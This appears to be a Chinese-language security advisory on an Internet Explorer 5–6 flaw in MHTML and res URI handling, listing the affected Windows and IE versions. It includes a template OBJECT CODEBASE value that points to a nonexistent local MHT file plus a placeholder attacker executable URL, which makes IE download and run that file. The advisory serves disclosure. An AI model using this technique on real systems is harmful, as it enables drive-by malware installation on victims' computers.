受影響系統(tǒng):
Microsoft Internet Explorer 6.0SP1
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.0.1SP3
Microsoft Internet Explorer 5.0.1SP2
Microsoft Internet Explorer 5.0.1SP1
Microsoft Internet Explorer 6.0
Microsoft Windows XP Professional
Microsoft Windows XP Home
Microsoft Windows NT 4.0 SP6a
Microsoft Windows ME
Microsoft Windows 98 SE
Microsoft Windows 98
Microsoft Windows 2003 Web Edition
Microsoft Windows 2003 Standard Edition
Microsoft Windows 2003 Enterprise Edition 64-bit
Microsoft Windows 2003 Enterprise Edition
Microsoft Windows 2003 Datacenter Edition 64-bit
Microsoft Windows 2003 Datacenter Edition
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
詳細(xì)描述:
Microsoft Internet Explorer是一款流行的WEB瀏覽程序。Microsoft Internet Explorer在處理MHTML文件和res URIs存在問(wèn)題,遠(yuǎn)程攻擊者可以利用這個(gè)漏洞從惡意位置裝載嵌入對(duì)象,在安全區(qū)域中執(zhí)行。
當(dāng)MSIE可以嘗試獲取嵌入在MHT文件中的文件:mhtml:[Mhtml_File_Url]![Original_Resource_Url]
如果[Original_Resource_Url] 不能從[Mhtml_File_Url]中獲取,IE就會(huì)嘗試[Original_Resource_Url]和返回內(nèi)容,這類似HTTP重定向,并且CODEBASE執(zhí)行是基于URL檢查,因此在本地電腦安全中,把一個(gè)沒(méi)有使用CLSID的OBJECT標(biāo)記的CODEBASE屬性指向:mhtml:file:///C:\No_SUCH_MHT.MHT![Attaker_PayloadEXE_Url]
IE就會(huì)[Attaker_PayloadEXE_Url]并執(zhí)行。
目前Microsoft(http://www.microsoft.com/windows/ie/default.asp)還沒(méi)有提供補(bǔ)丁程序。
